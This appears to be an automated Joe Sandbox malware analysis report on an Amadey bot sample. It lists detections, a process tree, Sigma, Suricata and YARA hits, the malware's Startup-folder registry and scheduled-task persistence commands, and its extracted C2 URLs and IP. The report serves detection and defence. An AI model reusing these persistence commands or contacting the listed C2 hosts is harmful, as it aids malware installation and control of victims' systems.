Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
S7AGd447vH.exe

Overview

General Information

Sample name:S7AGd447vH.exe
renamed because original name is a hash value
Original sample name:5F5C1A5DF77079F56EB5A61D19666728.exe
Analysis ID:1564918
MD5:5f5c1a5df77079f56eb5a61d19666728
SHA1:c2a99ac26eab563d62137c264b1a8cc9966342b9
SHA256:0b84cbf4fa7c5be869aaa09b09cbb49edcdaa3e88675304db0ee4fa498adc4c5
Tags:Amadeyexeuser-abuse_ch
Infos:

Detection

Amadey
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadey bot
Yara detected Amadeys stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Dllhost Internet Connection
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Unusual Parent Process For Cmd.EXE
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara signature match

Classification

Process Tree

  • System is w10x64
  • S7AGd447vH.exe (PID: 7524 cmdline: "C:\Users\user\Desktop\S7AGd447vH.exe" MD5: 5F5C1A5DF77079F56EB5A61D19666728)
    • dllhost.exe (PID: 7608 cmdline: "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" MD5: 5F5C1A5DF77079F56EB5A61D19666728)
      • cmd.exe (PID: 7676 cmdline: "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\3e5d740863\ MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7776 cmdline: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\3e5d740863\ MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • schtasks.exe (PID: 7708 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN dllhost.exe /TR "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" /F MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • dllhost.exe (PID: 7856 cmdline: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe MD5: 5F5C1A5DF77079F56EB5A61D19666728)
  • dllhost.exe (PID: 7192 cmdline: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe MD5: 5F5C1A5DF77079F56EB5A61D19666728)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{"C2 url": ["web.jsonpost.xyz/sj2vMs/index.php", "web.xmlpost.xyz/sj2vMs/index.php"], "Version": "2.71"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000003.1833879370.000000000088D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AmadeyYara detected Amadey botJoe Security
      00000001.00000003.1817745095.000000000088D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AmadeyYara detected Amadey botJoe Security
        00000001.00000003.1748937794.0000000000600000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          00000001.00000003.1748937794.0000000000600000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Amadey_7abb059bunknownunknown
          • 0xae0d:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
          00000001.00000003.1748937794.0000000000600000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Amadey_c4df8d4aunknownunknown
          • 0x32bc4:$a1: D:\Mktmp\NL1\Release\NL1.pdb
          Click to see the 28 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          1.3.dllhost.exe.2204848.4.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            1.3.dllhost.exe.2204848.4.unpackWindows_Trojan_Amadey_7abb059bunknownunknown
            • 0x5a0d:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
            1.3.dllhost.exe.2204848.4.unpackWindows_Trojan_Amadey_c4df8d4aunknownunknown
            • 0x2d3c4:$a1: D:\Mktmp\NL1\Release\NL1.pdb
            0.3.S7AGd447vH.exe.914800.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              0.3.S7AGd447vH.exe.914800.0.unpackWindows_Trojan_Amadey_7abb059bunknownunknown
              • 0x5a0d:$a: 18 83 78 14 10 72 02 8B 00 6A 01 6A 00 6A 00 6A 00 6A 00 56
              Click to see the 55 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Files With System Process Name In Unsuspected Locations
              Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\S7AGd447vH.exe, ProcessId: 7524, TargetFilename: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
              Sigma detected: System File Execution Location Anomaly
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" , CommandLine: "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe, ParentCommandLine: "C:\Users\user\Desktop\S7AGd447vH.exe", ParentImage: C:\Users\user\Desktop\S7AGd447vH.exe, ParentProcessId: 7524, ParentProcessName: S7AGd447vH.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" , ProcessId: 7608, ProcessName: dllhost.exe
              Sigma detected: Direct Autorun Keys Modification
              Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\3e5d740863\, CommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\3e5d740863\, CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\3e5d740863\, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7676, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\3e5d740863\, ProcessId: 7776, ProcessName: reg.exe
              Sigma detected: Dllhost Internet Connection
              Source: Network ConnectionAuthor: bartblaze: Data: DestinationIp: 72.52.178.23, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe, Initiated: true, ProcessId: 7608, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
              Sigma detected: Suspicious Add Scheduled Task Parent
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN dllhost.exe /TR "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN dllhost.exe /TR "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe, ParentProcessId: 7608, ParentProcessName: dllhost.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN dllhost.exe /TR "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" /F, ProcessId: 7708, ProcessName: schtasks.exe
              Sigma detected: Suspicious Schtasks From Env Var Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN dllhost.exe /TR "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN dllhost.exe /TR "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe, ParentProcessId: 7608, ParentProcessName: dllhost.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN dllhost.exe /TR "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" /F, ProcessId: 7708, ProcessName: schtasks.exe
              Sigma detected: Unusual Parent Process For Cmd.EXE
              Source: Process startedAuthor: Tim Rauch: Data: Command: "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\3e5d740863\, CommandLine: "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\3e5d740863\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe, ParentProcessId: 7608, ParentProcessName: dllhost.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\3e5d740863\, ProcessId: 7676, ProcessName: cmd.exe

              Persistence and Installation Behavior

              barindex
              Sigma detected: Schedule system process
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN dllhost.exe /TR "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN dllhost.exe /TR "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe, ParentProcessId: 7608, ParentProcessName: dllhost.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN dllhost.exe /TR "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" /F, ProcessId: 7708, ProcessName: schtasks.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-29T01:52:04.981329+010020445971A Network Trojan was detected192.168.2.44973072.52.178.2380TCP
              2024-11-29T01:52:06.737552+010020445971A Network Trojan was detected192.168.2.44973372.52.178.2380TCP
              2024-11-29T01:52:08.193392+010020445971A Network Trojan was detected192.168.2.44973572.52.178.2380TCP
              2024-11-29T01:52:09.721376+010020445971A Network Trojan was detected192.168.2.44973772.52.178.2380TCP
              2024-11-29T01:52:10.873368+010020445971A Network Trojan was detected192.168.2.44973972.52.178.2380TCP
              2024-11-29T01:52:12.501363+010020445971A Network Trojan was detected192.168.2.44974172.52.178.2380TCP
              2024-11-29T01:52:13.985422+010020445971A Network Trojan was detected192.168.2.44974472.52.178.2380TCP
              2024-11-29T01:52:15.461450+010020445971A Network Trojan was detected192.168.2.44974772.52.178.2380TCP
              2024-11-29T01:52:16.814535+010020445971A Network Trojan was detected192.168.2.44975072.52.178.2380TCP
              2024-11-29T01:52:18.341354+010020445971A Network Trojan was detected192.168.2.44975372.52.178.2380TCP
              2024-11-29T01:52:20.089421+010020445971A Network Trojan was detected192.168.2.44975672.52.178.2380TCP
              2024-11-29T01:52:21.601531+010020445971A Network Trojan was detected192.168.2.44975972.52.178.2380TCP
              2024-11-29T01:52:23.129615+010020445971A Network Trojan was detected192.168.2.44976172.52.178.2380TCP
              2024-11-29T01:52:24.653443+010020445971A Network Trojan was detected192.168.2.44976372.52.178.2380TCP
              2024-11-29T01:52:26.189519+010020445971A Network Trojan was detected192.168.2.44976572.52.178.2380TCP
              2024-11-29T01:52:27.816621+010020445971A Network Trojan was detected192.168.2.44976872.52.178.2380TCP
              2024-11-29T01:52:29.405772+010020445971A Network Trojan was detected192.168.2.44977072.52.178.2380TCP
              2024-11-29T01:52:30.905524+010020445971A Network Trojan was detected192.168.2.44977272.52.178.2380TCP
              2024-11-29T01:52:32.477602+010020445971A Network Trojan was detected192.168.2.44977472.52.178.2380TCP
              2024-11-29T01:52:33.525668+010020445971A Network Trojan was detected192.168.2.44977672.52.178.2380TCP
              2024-11-29T01:52:35.029629+010020445971A Network Trojan was detected192.168.2.44977872.52.178.2380TCP
              2024-11-29T01:52:36.617642+010020445971A Network Trojan was detected192.168.2.44978072.52.178.2380TCP
              2024-11-29T01:52:38.165655+010020445971A Network Trojan was detected192.168.2.44978272.52.178.2380TCP
              2024-11-29T01:52:39.673883+010020445971A Network Trojan was detected192.168.2.44978472.52.178.2380TCP
              2024-11-29T01:52:40.534446+010020445971A Network Trojan was detected192.168.2.44978672.52.178.2380TCP
              2024-11-29T01:52:42.065611+010020445971A Network Trojan was detected192.168.2.44978872.52.178.2380TCP
              2024-11-29T01:52:43.541623+010020445971A Network Trojan was detected192.168.2.44979072.52.178.2380TCP
              2024-11-29T01:52:44.954479+010020445971A Network Trojan was detected192.168.2.44979272.52.178.2380TCP
              2024-11-29T01:52:46.373796+010020445971A Network Trojan was detected192.168.2.44979472.52.178.2380TCP
              2024-11-29T01:52:47.925689+010020445971A Network Trojan was detected192.168.2.44979672.52.178.2380TCP
              2024-11-29T01:52:49.357695+010020445971A Network Trojan was detected192.168.2.44979872.52.178.2380TCP
              2024-11-29T01:52:51.173677+010020445971A Network Trojan was detected192.168.2.44980072.52.178.2380TCP
              2024-11-29T01:52:52.621722+010020445971A Network Trojan was detected192.168.2.44980272.52.178.2380TCP
              2024-11-29T01:52:54.185690+010020445971A Network Trojan was detected192.168.2.44980472.52.178.2380TCP
              2024-11-29T01:52:55.664544+010020445971A Network Trojan was detected192.168.2.44980872.52.178.2380TCP
              2024-11-29T01:52:57.249610+010020445971A Network Trojan was detected192.168.2.44981072.52.178.2380TCP
              2024-11-29T01:52:58.836751+010020445971A Network Trojan was detected192.168.2.44981772.52.178.2380TCP
              2024-11-29T01:53:00.309747+010020445971A Network Trojan was detected192.168.2.44982472.52.178.2380TCP
              2024-11-29T01:53:01.814602+010020445971A Network Trojan was detected192.168.2.44982672.52.178.2380TCP
              2024-11-29T01:53:03.285841+010020445971A Network Trojan was detected192.168.2.44983372.52.178.2380TCP
              2024-11-29T01:53:04.862658+010020445971A Network Trojan was detected192.168.2.44984072.52.178.2380TCP
              2024-11-29T01:53:06.337850+010020445971A Network Trojan was detected192.168.2.44984372.52.178.2380TCP
              2024-11-29T01:53:07.853949+010020445971A Network Trojan was detected192.168.2.44985072.52.178.2380TCP
              2024-11-29T01:53:09.357786+010020445971A Network Trojan was detected192.168.2.44985772.52.178.2380TCP
              2024-11-29T01:53:10.877867+010020445971A Network Trojan was detected192.168.2.44986072.52.178.2380TCP
              2024-11-29T01:53:12.361810+010020445971A Network Trojan was detected192.168.2.44986672.52.178.2380TCP
              2024-11-29T01:53:13.881838+010020445971A Network Trojan was detected192.168.2.44987272.52.178.2380TCP
              2024-11-29T01:53:14.881773+010020445971A Network Trojan was detected192.168.2.44987472.52.178.2380TCP
              2024-11-29T01:53:16.601975+010020445971A Network Trojan was detected192.168.2.44988172.52.178.2380TCP
              2024-11-29T01:53:18.109853+010020445971A Network Trojan was detected192.168.2.44988872.52.178.2380TCP
              2024-11-29T01:53:19.769801+010020445971A Network Trojan was detected192.168.2.44989072.52.178.2380TCP
              2024-11-29T01:53:20.525902+010020445971A Network Trojan was detected192.168.2.44989772.52.178.2380TCP
              2024-11-29T01:53:22.074131+010020445971A Network Trojan was detected192.168.2.44989972.52.178.2380TCP
              2024-11-29T01:53:23.663366+010020445971A Network Trojan was detected192.168.2.44990672.52.178.2380TCP
              2024-11-29T01:53:24.994496+010020445971A Network Trojan was detected192.168.2.44991372.52.178.2380TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-29T01:52:05.730293+010020277001Malware Command and Control Activity Detected192.168.2.44973172.52.178.2380TCP
              2024-11-29T01:52:07.320341+010020277001Malware Command and Control Activity Detected192.168.2.44973272.52.178.2380TCP
              2024-11-29T01:52:08.687931+010020277001Malware Command and Control Activity Detected192.168.2.44973472.52.178.2380TCP
              2024-11-29T01:52:10.108473+010020277001Malware Command and Control Activity Detected192.168.2.44973672.52.178.2380TCP
              2024-11-29T01:52:11.528470+010020277001Malware Command and Control Activity Detected192.168.2.44973872.52.178.2380TCP
              2024-11-29T01:52:12.981025+010020277001Malware Command and Control Activity Detected192.168.2.44974072.52.178.2380TCP
              2024-11-29T01:52:14.408327+010020277001Malware Command and Control Activity Detected192.168.2.44974372.52.178.2380TCP
              2024-11-29T01:52:15.830022+010020277001Malware Command and Control Activity Detected192.168.2.44974672.52.178.2380TCP
              2024-11-29T01:52:17.254440+010020277001Malware Command and Control Activity Detected192.168.2.44974872.52.178.2380TCP
              2024-11-29T01:52:18.722005+010020277001Malware Command and Control Activity Detected192.168.2.44975272.52.178.2380TCP
              2024-11-29T01:52:20.080275+010020277001Malware Command and Control Activity Detected192.168.2.44975572.52.178.2380TCP
              2024-11-29T01:52:21.513735+010020277001Malware Command and Control Activity Detected192.168.2.44975772.52.178.2380TCP
              2024-11-29T01:52:23.009476+010020277001Malware Command and Control Activity Detected192.168.2.44976072.52.178.2380TCP
              2024-11-29T01:52:24.420715+010020277001Malware Command and Control Activity Detected192.168.2.44976272.52.178.2380TCP
              2024-11-29T01:52:25.838374+010020277001Malware Command and Control Activity Detected192.168.2.44976472.52.178.2380TCP
              2024-11-29T01:52:27.246125+010020277001Malware Command and Control Activity Detected192.168.2.44976672.52.178.2380TCP
              2024-11-29T01:52:28.667905+010020277001Malware Command and Control Activity Detected192.168.2.44976772.52.178.2380TCP
              2024-11-29T01:52:30.046260+010020277001Malware Command and Control Activity Detected192.168.2.44976972.52.178.2380TCP
              2024-11-29T01:52:31.416923+010020277001Malware Command and Control Activity Detected192.168.2.44977172.52.178.2380TCP
              2024-11-29T01:52:32.825359+010020277001Malware Command and Control Activity Detected192.168.2.44977372.52.178.2380TCP
              2024-11-29T01:52:34.293986+010020277001Malware Command and Control Activity Detected192.168.2.44977572.52.178.2380TCP
              2024-11-29T01:52:35.714251+010020277001Malware Command and Control Activity Detected192.168.2.44977772.52.178.2380TCP
              2024-11-29T01:52:37.136655+010020277001Malware Command and Control Activity Detected192.168.2.44977972.52.178.2380TCP
              2024-11-29T01:52:38.560137+010020277001Malware Command and Control Activity Detected192.168.2.44978172.52.178.2380TCP
              2024-11-29T01:52:39.955197+010020277001Malware Command and Control Activity Detected192.168.2.44978372.52.178.2380TCP
              2024-11-29T01:52:41.437541+010020277001Malware Command and Control Activity Detected192.168.2.44978572.52.178.2380TCP
              2024-11-29T01:52:42.812140+010020277001Malware Command and Control Activity Detected192.168.2.44978772.52.178.2380TCP
              2024-11-29T01:52:44.285726+010020277001Malware Command and Control Activity Detected192.168.2.44978972.52.178.2380TCP
              2024-11-29T01:52:45.654435+010020277001Malware Command and Control Activity Detected192.168.2.44979172.52.178.2380TCP
              2024-11-29T01:52:47.027381+010020277001Malware Command and Control Activity Detected192.168.2.44979372.52.178.2380TCP
              2024-11-29T01:52:48.498487+010020277001Malware Command and Control Activity Detected192.168.2.44979572.52.178.2380TCP
              2024-11-29T01:52:49.872718+010020277001Malware Command and Control Activity Detected192.168.2.44979772.52.178.2380TCP
              2024-11-29T01:52:51.253942+010020277001Malware Command and Control Activity Detected192.168.2.44979972.52.178.2380TCP
              2024-11-29T01:52:52.668893+010020277001Malware Command and Control Activity Detected192.168.2.44980172.52.178.2380TCP
              2024-11-29T01:52:54.150875+010020277001Malware Command and Control Activity Detected192.168.2.44980372.52.178.2380TCP
              2024-11-29T01:52:55.737832+010020277001Malware Command and Control Activity Detected192.168.2.44980672.52.178.2380TCP
              2024-11-29T01:52:57.130060+010020277001Malware Command and Control Activity Detected192.168.2.44980972.52.178.2380TCP
              2024-11-29T01:52:58.608525+010020277001Malware Command and Control Activity Detected192.168.2.44981672.52.178.2380TCP
              2024-11-29T01:53:00.074698+010020277001Malware Command and Control Activity Detected192.168.2.44981872.52.178.2380TCP
              2024-11-29T01:53:01.540031+010020277001Malware Command and Control Activity Detected192.168.2.44982572.52.178.2380TCP
              2024-11-29T01:53:02.950391+010020277001Malware Command and Control Activity Detected192.168.2.44982972.52.178.2380TCP
              2024-11-29T01:53:05.839066+010020277001Malware Command and Control Activity Detected192.168.2.44984172.52.178.2380TCP
              2024-11-29T01:53:07.198687+010020277001Malware Command and Control Activity Detected192.168.2.44984472.52.178.2380TCP
              2024-11-29T01:53:08.734615+010020277001Malware Command and Control Activity Detected192.168.2.44984972.52.178.2380TCP
              2024-11-29T01:53:10.104833+010020277001Malware Command and Control Activity Detected192.168.2.44985672.52.178.2380TCP
              2024-11-29T01:53:11.511432+010020277001Malware Command and Control Activity Detected192.168.2.44985872.52.178.2380TCP
              2024-11-29T01:53:12.937105+010020277001Malware Command and Control Activity Detected192.168.2.44986572.52.178.2380TCP
              2024-11-29T01:53:14.315574+010020277001Malware Command and Control Activity Detected192.168.2.44987172.52.178.2380TCP
              2024-11-29T01:53:15.684627+010020277001Malware Command and Control Activity Detected192.168.2.44987372.52.178.2380TCP
              2024-11-29T01:53:17.102127+010020277001Malware Command and Control Activity Detected192.168.2.44988072.52.178.2380TCP
              2024-11-29T01:53:18.479497+010020277001Malware Command and Control Activity Detected192.168.2.44988372.52.178.2380TCP
              2024-11-29T01:53:19.887473+010020277001Malware Command and Control Activity Detected192.168.2.44988972.52.178.2380TCP
              2024-11-29T01:53:21.308380+010020277001Malware Command and Control Activity Detected192.168.2.44989572.52.178.2380TCP
              2024-11-29T01:53:22.774742+010020277001Malware Command and Control Activity Detected192.168.2.44989872.52.178.2380TCP
              2024-11-29T01:53:24.251424+010020277001Malware Command and Control Activity Detected192.168.2.44990572.52.178.2380TCP
              2024-11-29T01:53:25.627830+010020277001Malware Command and Control Activity Detected192.168.2.44991172.52.178.2380TCP
              2024-11-29T01:53:27.116604+010020277001Malware Command and Control Activity Detected192.168.2.44991472.52.178.2380TCP
              2024-11-29T01:53:27.597306+010020277001Malware Command and Control Activity Detected192.168.2.44992172.52.178.2380TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: S7AGd447vH.exeAvira: detected
              Antivirus detection for URL or domain
              Source: web.jsonpost.xyz/sj2vMs/index.phpAvira URL Cloud: Label: phishing
              Source: web.xmlpost.xyz/sj2vMs/index.phpAvira URL Cloud: Label: phishing
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeAvira: detection malicious, Label: TR/Fraud.Gen8
              Found malware configuration
              Source: 1.3.dllhost.exe.2204848.4.raw.unpackMalware Configuration Extractor: Amadey {"C2 url": ["web.jsonpost.xyz/sj2vMs/index.php", "web.xmlpost.xyz/sj2vMs/index.php"], "Version": "2.71"}
              Multi AV Scanner detection for domain / URL
              Source: web.jsonpost.xyz/sj2vMs/index.phpVirustotal: Detection: 9%Perma Link
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeReversingLabs: Detection: 65%
              Multi AV Scanner detection for submitted file
              Source: S7AGd447vH.exeReversingLabs: Detection: 65%
              Source: S7AGd447vH.exeVirustotal: Detection: 69%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: S7AGd447vH.exeJoe Sandbox ML: detected

              Compliance

              barindex
              Detected unpacking (overwrites its own PE header)
              Source: C:\Users\user\Desktop\S7AGd447vH.exeUnpacked PE file: 0.2.S7AGd447vH.exe.400000.0.unpack
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeUnpacked PE file: 7.2.dllhost.exe.400000.0.unpack
              Source: S7AGd447vH.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: Binary string: OfficeDesktop.pdb source: S7AGd447vH.exe, dllhost.exe.0.dr
